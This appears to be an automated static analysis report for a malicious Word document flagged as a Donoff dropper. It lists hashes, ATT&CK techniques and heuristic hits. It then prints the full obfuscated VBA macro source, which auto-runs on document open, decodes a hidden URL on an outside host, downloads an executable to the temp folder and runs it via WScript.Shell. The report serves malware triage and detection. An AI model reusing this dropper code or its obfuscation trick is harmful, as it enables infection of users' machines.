Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 81b046c5fc8974e4…

MALICIOUS

Office (OLE)

72.0 KB Created: 2016-05-09 21:46:00 Authoring application: Microsoft Office Word First seen: 2018-09-04
MD5: fdea0fb77ebe8c7e18586e0dc397d780 SHA-1: d863efe5436cb7e8cb648b8d856d865fefa7169b SHA-256: 81b046c5fc8974e4e67ec360bc7a4b8f9a1adf3e70b21838854a18bc55d5f428
330 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains VBA macros, including a Document_Open macro, which is a common technique for executing malicious code upon opening the document. Critical heuristics indicate the use of WScript.Shell and Shell() calls, suggesting the macro attempts to download and execute a second-stage payload. The ClamAV detection name 'Doc.Dropper.Donoff-5743530-0' further supports this dropper functionality.

Heuristics 10

  • ClamAV: Doc.Dropper.Donoff-5743530-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Donoff-5743530-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Dim xsgkc As Integer
Set GyPisf = CreateObject("WScript.Shell")
End Function
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Dim iefLgDr As Boolean
Set FLShO = CreateObject("ADODB.Stream")
End Function
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
    Matched line in script
    Dim VgJNGXss As Integer, kTRGfWEy As Integer
CIYCZoYhXh = CallByName(MwpidILpwg, jcsrbfdFy, 2)
End Function
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Attribute VB_Customizable = True
Private Sub Document_Open()
Dim tHhOFMYobG As Boolean
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7822 bytes
SHA-256: 82985b1c7522f789c56ef3288b35c08ab3380cf09d3d4d1928be830394273f45
Detection
ClamAV: No threats found
Obfuscation or payload: likely
143 of 219 identifiers look randomly generated (e.g. 'RxKeNsKpNonKsCeCBKoNxdKy') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Dim tHhOFMYobG As Boolean
dOpDT.TcaPnshrwF
End Sub
Private Sub LYhWGugAVG()
RdzCgNLfo "x3H95rUtaTg2Sx", "j0OlshxnPrJTdNW", False
cdVmY 1519, False, True
End Sub

Attribute VB_Name = "hSMqMmUHxK"
Private Sub fEaAA(ByVal vPPqmsUc As String)
cUAGYTZsVc 1225, 2737, "VJw4Y40vdXH"
eeccmroa 8244
sIezp
qjETUiCBEo 1195, "GBAi4sZhgOF6", "ZqJFlT4l1hOI9"
End Sub
Public Function XzBOMbkAgR(ByVal ZVceD As Integer, ByVal apJduWx As String) As String
Dim lcjLZKp As Boolean
XzBOMbkAgR = Mid(apJduWx, ZVceD, 1)
End Function
Private Sub POoyoRUbzA(ByVal YhYcIcjoZ As String)
yqdpRWtCu
End Sub
Public Function hBvaGDuz(ByVal kwcbSQdwc As String, ByVal IIqnbM As String, ByVal pbxLXzcjXj As String) As Boolean
Dim XctdMEDmXi As String
Dim NybZgGOL As String
hBvaGDuz = InStr(1, pbxLXzcjXj, kwcbSQdwc)
End Function

Attribute VB_Name = "EEFwbzJc"
Public Function CIYCZoYhXh(ByVal MwpidILpwg As Object, ByVal XHCAEVM As String, ByVal jcsrbfdFy As String, ByVal wUxRp As Integer) As Variant
Dim VgJNGXss As Integer, kTRGfWEy As Integer
CIYCZoYhXh = CallByName(MwpidILpwg, jcsrbfdFy, 2)
End Function
Public Sub jbBIHbQgK(ByVal tIlLqGBv As String, ByVal ScnYjwlXy As Variant, ByVal Inmsl As Variant, ByVal YJPSciQgO As Object)
Dim UiomhhzdP As String
CallByName YJPSciQgO, tIlLqGBv, 1, Inmsl, ScnYjwlXy
End Sub
Private Function INLAOnszE() As Boolean
HTXti "ZCG8Io9bvuJndTc"
INLAOnszE = False
End Function
Public Function wvXRehsrG(ByVal TwQoCXtdE As String, ByVal fiZYEpgo As String, ByVal KvQrpPiAb As Object) As Variant
Dim YZpSl As Boolean
Dim cpjereJCH As Boolean
Set wvXRehsrG = CallByName(KvQrpPiAb, fiZYEpgo, 2, TwQoCXtdE)
End Function
Public Sub jJEnbLdZJ(ByVal VQdaUjljZO As Boolean, ByVal DGwqVDSk As String, ByVal kdWgX As Object, ByVal iSwlxPbi As Variant)
Dim ahoVXYaVk As Integer
Dim RTKgzr As Integer
CallByName kdWgX, DGwqVDSk, 1, iSwlxPbi
End Sub
Private Sub uBsiWmu(ByVal svbXnttmX As Boolean)
NvOKlpusE
aVtapbVnl "WwNEeAH4PbZhj", 1093, 9096
End Sub
Private Function PcnRli() As Integer
nCnktKv False
hCCQENhD 3748, 2598, "7gtu1KlkV79dHg"
CGgZkEaFBc
PcnRli = 1258
End Function
Public Sub lSyMgpZNM(ByVal LWyYizpgWQ As Integer, ByVal DaODYiz As String, ByVal aULfFShP As Variant, ByVal UbwdH As String, ByVal lzTGvRj As Object)
CallByName lzTGvRj, DaODYiz, 4, aULfFShP
End Sub
Private Function KAasSxTleR(ByVal aOZZYWW As String) As Boolean
gOZso 1884
KAasSxTleR = True
End Function
Public Sub RbXPvrO(ByVal ubZLajeKsC As Object, ByVal ezIpMrsqrl As String)
Dim MDoAbeuOSu As Integer
Dim VOMlRjtl As Integer
kayWGvM = "ilMrjQX08"
CallByName ubZLajeKsC, ezIpMrsqrl, 1
End Sub

Attribute VB_Name = "ZVECJdWqd"
Public Function PBdoTIA(ByVal DmsIj As String, ByVal XRSqVtkY As String) As String
Dim hNXSdLKx As Boolean
Dim LRVUTxkO As String, IBGFmd As String
For BBfqeRw = 1 To Len(DmsIj)
hNXSdLKx = hSMqMmUHxK.hBvaGDuz(hSMqMmUHxK.XzBOMbkAgR(BBfqeRw, DmsIj), dJutmQPO, XRSqVtkY)
If Not hNXSdLKx Then
XQUKUIlGS = 9746
PBdoTIA = PBdoTIA & hSMqMmUHxK.XzBOMbkAgR(BBfqeRw, DmsIj)
End If
Next
End Function
Private Function dJutmQPO() As String
IkmTucyV = "qzqbqcJFSBkQ"
dJutmQPO = "4UkJLINs48O"
End Function

Attribute VB_Name = "mrwMbne"
Public Function FLShO() As Object
Dim iefLgDr As Boolean
Set FLShO = CreateObject("ADODB.Stream")
End Function
Public Function GyPisf() As Object
Dim xsgkc As Integer
Set GyPisf = CreateObject("WScript.Shell")
End Function
Public Function hQuVOiES() As Object
Dim hMokh As String
Set hQuVOiES = CreateObject("MSXML2.ServerXMLHTTP.6.0")
End Function
Private Function wrqKcnr() As Integer
YRcIVIcog
zzTmoaeZe False, "dDk9r6dkaRSoGhq"
ngYFxDZeTQ False, 7239, "OrfnZtOwLTm"
wrqKcnr = 7668
End Function

Attribute VB_Name = "dOpDT"
Private Function UhWgqojP() As String
qAgGuRAod = 7052
UhWgqojP = ZVECJdWqd.PBdoTIA("hE1t1tSp:S/E/EsS1a1scEuEaS.1ScEoEmS/sEySsEEteSmS1/cSSa1cEhe1S/31E2fSE32ESg.E1exE1e", "ES1")
End Function
Private Sub vFYXRkRUIc(ByVal FTFFXpuE As String)
Dim HGiiZMDxQx As Integer
MDpGo = "2n6iDvJJ5gQ"
EEFwbzJc.jJEnbLdZJ True, GqRYhntjBm, mrwMbne.GyPisf, FTFFXpuE
End Sub
Public Sub TcaPnshrwF()
cKAIKaerq = "dQfCGmXD6uZd7R"
IjkZu
End Sub
Private Function syCnP() As String
syCnP = "0haTYeWJT8d6Vln"
End Function
Private Function WAVGwig() As String
Dim GsLpaL As Integer
WAVGwig = QkQwxQUrJX(ZVECJdWqd.PBdoTIA("eTJEoMPe", "eJo")) & JBRfAkeKg
End Function
Private Function CfXXBsH() As String
CfXXBsH = ZVECJdWqd.PBdoTIA("RxKeNsKpNonKsCeCBKoNxdKy", "NKCx")
End Function
Private Function qeEwZZH() As String
qeEwZZH = "2zZ5VEfUNAsSr"
End Function
Private Sub laCgILS(ByVal BmZaijroi As Integer, ByVal KjNqfm As String, ByVal mDofY As String, ByVal aCGQNGDMOl As String)
Dim YRyDNs As String, ZyPTWCYq As Integer
Set rTaEqRRZo = mrwMbne.hQuVOiES
rTaEqRRZo.Open eAhdcwBlOd, mDofY, False
EEFwbzJc.RbXPvrO rTaEqRRZo, ZVECJdWqd.PBdoTIA("PSeYbndb", "bPY")
fElfKivp False, KjNqfm, "znMj5xsOm2HIZxC", EEFwbzJc.CIYCZoYhXh(rTaEqRRZo, "YxCpNp7qKGfs", CfXXBsH, 1945)
End Sub
Private Function buYBmz() As String
buYBmz = ZVECJdWqd.PBdoTIA("CRlAoRsAAe", "ERNA")
End Function
Private Function SSljFXj() As String
Dim tjTHkpKcA As Integer
SSljFXj = UhWgqojP
End Function
Private Sub qGTBBr()
JPvLzyRGsx 7449
NURQhgJR
bFqvCc False, True, 9563
qjMaTOIxQi
End Sub
Private Function JBRfAkeKg() As String
Dim gUPCu As String
Dim AmmMJkyAk As Integer
JBRfAkeKg = PbHdKfAH
End Function
Private Sub IjkZu()
On Error GoTo oWzkOggyfs
laCgILS 5708, WAVGwig, SSljFXj, qeEwZZH
ieHcrIl = "WtLfeLLInU"
vFYXRkRUIc WAVGwig
Exit Sub
QIGVmfY = "neXlLNt90pWU"
oWzkOggyfs:
End Sub
Private Function PbHdKfAH() As String
IFLCzb = True
PbHdKfAH = ZVECJdWqd.PBdoTIA("j/dgj02kj1g1S66Sjbagrf.Sjexkje", "Sjgkr")
End Function
Private Function PfpjSfzeo(ByVal bAMLQ As Integer, ByVal esHLJ As Boolean) As String
ICxOAIJEjl
JDQNlwwUu
ubsRjN True
PfpjSfzeo = "R7GlmzhN48QP"
End Function
Private Function GuuJgeEbw(ByVal WZeAmBIRY As Boolean) As Boolean
If NACpLN("PljGjzYcgvtUJ", "yDtjd6h7eAT") Then
GbhxArF
Halxgk
End If
nDkOinXoNp
SclaOvXM 3912, False, "jDTQ1gdsz8v"
SFyHb
GuuJgeEbw = False
End Function
Private Sub IijiePOOwa()
aBDhFcyR "vBMJNzqqq3Hi", "npX7H3FaUuwjKF"
End Sub
Private Function eAhdcwBlOd() As String
bwVhN = 9168
eAhdcwBlOd = ZVECJdWqd.PBdoTIA("GHZEjT", "4jZc0H")
End Function
Private Function zQDUtoJEH() As String
zQDUtoJEH = ZVECJdWqd.PBdoTIA("wOpWeinw", "wiW")
End Function
Private Function GqRYhntjBm() As String
mVMPpQPeMQ = 3401
GqRYhntjBm = ZVECJdWqd.PBdoTIA("jE0xe0jc", "jWh60f")
End Function
Private Sub fElfKivp(ByVal VKVWlJjNxy As Boolean, ByVal TfkFwTxiJ As String, ByVal fSNWG As String, ByVal bzeumiS As Variant)
Dim YeWgHtdIb As String
Set NBVHjeQanl = mrwMbne.FLShO
bZfJcN = 978
EEFwbzJc.lSyMgpZNM 654, KVMrUx, 1, syCnP, NBVHjeQanl
EEFwbzJc.RbXPvrO NBVHjeQanl, zQDUtoJEH
EEFwbzJc.jJEnbLdZJ True, ZVECJdWqd.PBdoTIA("Wbr3i0OtOe", "b3O0"), NBVHjeQanl, bzeumiS
EEFwbzJc.jbBIHbQgK ZVECJdWqd.PBdoTIA("hSaGhverTGhoFGrilGeG", "rhG"), 2, TfkFwTxiJ, NBVHjeQanl
EEFwbzJc.RbXPvrO NBVHjeQanl, buYBmz
End Sub
Private Function QkQwxQUrJX(ByVal SRcRG As String) As String
Set pWjJDbAT = EEFwbzJc.wvXRehsrG(ZVECJdWqd.PBdoTIA("rPrROFCr0ErSFS", "r0F"), ZVECJdWqd.PBdoTIA("EWwn vi  ro00n0mwenWtw", "Ww0 "), mrwMbne.GyPisf)
ZcTzOUAO = False
QkQwxQUrJX = pWjJDbAT(SRcRG)
End Function
Private Function KVMrUx() As String
KVMrUx = ZVECJdWqd.PBdoTIA("TPyPlpe1", "1lmPs")
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.